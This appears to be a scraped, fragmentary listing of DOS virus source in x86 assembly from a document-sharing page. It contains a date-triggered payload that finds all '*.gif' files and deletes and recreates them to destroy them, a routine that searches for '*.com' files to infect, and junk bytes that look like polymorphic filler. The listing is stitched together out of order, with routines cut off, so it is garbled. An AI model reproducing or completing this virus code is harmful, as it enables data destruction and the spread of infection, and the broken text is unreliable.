Professional Documents
Culture Documents
call get_weekday
cmp ax,0005h ; did the function return 5?
je strt00 ; if equal, do effect
jmp end00 ; otherwise skip over it
strt00: lea dx,[di + data00] ; dx points to data
mov ah,04eh ; dos find first file function
mov cx,00100111b ; all file attributes valid
int 021h
jc erase_done ; exit procedure on failure
mov ah,02fh ; dos get dta function
int 021h
lea dx,[bx + 01eh] ; dx points to filename in dta
erase_loop: mov ah,041h ; dos delete file function
int 021h
mov ah,03ch ; dos create file function
xor cx,cx ; no attributes for new file
int 021h
mov ah,041h ; dos delete file function
int 021h
mov ah,04fh ; dos find next file function
int 021h
jnc erase_loop ; repeat until no files left
erase_done:
end00:
com_end: pop dx ; dx holds original dta address
mov ah,01ah ; dos set dta function
int 021h
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
db 0fah,045h,02eh,0b3h,024h
leave_traverse:
lea dx,[di + com_mask] ; dx points to "*.com"
call find_files ; try to infect a file
done_searching: mov sp,bp ; restore old stack frame
mov ah,01ah ; dos set dta function
pop dx ; retrieve old dta address
int 021h
pop bp ; restore bp
ret ; return to caller
db 0a6h,03ch,0b6h,078h,0cch
pop bp ; restore bp
ret ; return to caller
find_files endp
db 002h,0efh,034h,048h,091h
infect_file proc near
mov ah,02fh ; dos get dta address function
int 021h
mov si,bx ; si points to the dta
infection_done: cmp byte ptr [di + set_carry],1 ; set carry flag if failed
ret ; return to caller
db 089h,043h,03bh,054h,0aah
data00 db "*.gif",0
pop cx ; restore cx
pop si ; restore si
inc cx ; copy the ret also this time
rep movsb ; copy the routine again
code ends
end main